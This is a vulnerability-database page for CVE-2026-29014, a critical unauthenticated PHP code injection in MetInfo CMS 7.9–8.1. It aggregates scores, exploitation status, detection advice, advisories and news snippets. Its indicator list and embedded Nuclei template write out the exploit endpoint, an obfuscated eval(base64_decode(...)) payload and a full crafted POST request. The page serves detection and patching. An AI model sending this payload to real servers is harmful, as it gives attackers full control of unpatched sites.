CVE-2026-29014
published 2026-04-01CVE-2026-29014: MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by…
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
39.69%
98.4th percentile
MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| metinfo | metinfo | — | — |
| metinfo | metinfo | — | — |
| metinfo | metinfo | — | — |
| metinfo_cms | metinfo_cms | 7.9.0 – 8.1.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/app/system/entrance.php?n=include&m=module&c=weixin&a=doapi
command${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)])))}
otherContent-Type: application/xml with header C: {{base64("echo {{num1}}*{{num2}};die();")}}}
- →Monitor for POST requests to /app/system/entrance.php with query parameters n=include&m=module&c=weixin&a=doapi and Content-Type: application/xml, which is the exploit delivery endpoint for CVE-2026-29014.
- →Detect PHP code injection payloads in HTTP headers or XML body targeting MetInfo, specifically use of eval(base64_decode($_SERVER[...])) patterns delivered via the custom 'C' HTTP header.
- →Exploitation activity has been observed originating from China and Hong Kong IP addresses; geo-filter or alert on inbound requests to MetInfo endpoints from these regions, especially after April 25, 2026. ↗
- ·Affected versions are MetInfo CMS 7.9, 8.0, and 8.1; patches were released April 7, 2026. Instances not yet patched remain at critical risk (CVSS 9.8). ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wqc8-9v27-r965: MetInfo CMS versions 7
ghsa_unreviewed·2026-04-01
CVE-2026-29014 [CRITICAL] CWE-94 GHSA-wqc8-9v27-r965: MetInfo CMS versions 7
MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server.
VulnCheck
metinfo metinfo Improper Control of Generation of Code ('Code Injection')
vulncheck·2026·CVSS 9.3
CVE-2026-29014 [CRITICAL] metinfo metinfo Improper Control of Generation of Code ('Code Injection')
metinfo metinfo Improper Control of Generation of Code ('Code Injection')
MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server.
Affected: metinfo metinfo
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2026-29014&date=2026-04-25
No detection rules found.
Nuclei
MetInfo CMS <= 8.1 - Remote Code Execution
nuclei·CVSS 9.3
CVE-2026-29014 [CRITICAL] MetInfo CMS <= 8.1 - Remote Code Execution
MetInfo CMS eventSCANadminlogin&../config/tables{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}
matchers:
- type: dsl
dsl:
- 'contains(body, "success")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
C: {{base64("echo {{num1}}*{{num2}};die();")}}
eventSCANadminlogin&Array
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains(body, "{{result}}")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502201b950d08df779c1d71a849dba498de9dd2ea3d37572231c6689e22cb3a0d202102210081a12c8848627e22860d278ff07ac6350ea5241537add9109ef2f428eb4cb622:922c64590222798bb761d5b6d8e72950
Hackernews
⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More
blogs_hackernews·2026-05-11·CVSS 9.3
CVE-2026-6973 [CRITICAL] ⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More
Rough Monday.
Somebody poisoned a trusted download again, somebody else turned cloud servers into public housing, and a few crews are still getting into boxes with bugs that should’ve died years ago — the same old holes, same lazy access paths, same “how the hell is this still open” feeling. One report this week basically reads like a guy tripped over root access by accident and decided to stay there.
The weird part is how normal this all sounds now. Fake updates. Quiet backdoors. Remote tools are used like skeleton keys. Forum rats swapping st
Hackernews
MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks
blogs_hackernews·2026-05-05·CVSS 9.3
CVE-2026-29014 [CRITICAL] MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks
Threat actors are actively exploiting a critical security flaw impacting an open-source content management system (CMS) known as MetInfo, according to new findings from VulnCheck.
The vulnerability in question is CVE-2026-29014 (CVSS score: 9.8), a code injection flaw that could result in arbitrary code execution.
"MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code," the NIST National Vulnerability Dat
https://karmainsecurity.com/KIS-2026-06https://www.metinfo.cn/https://www.vulncheck.com/advisories/metinfo-cms-unauthenticated-php-code-injection-rcehttp://seclists.org/fulldisclosure/2026/Apr/1https://websec.net/blog/cve-2026-29014-metinfo-cms-unauthenticated-php-code-injection-69cdc290c14a8a99e1f91b7a
2026-04-01
Published
Exploited in the wild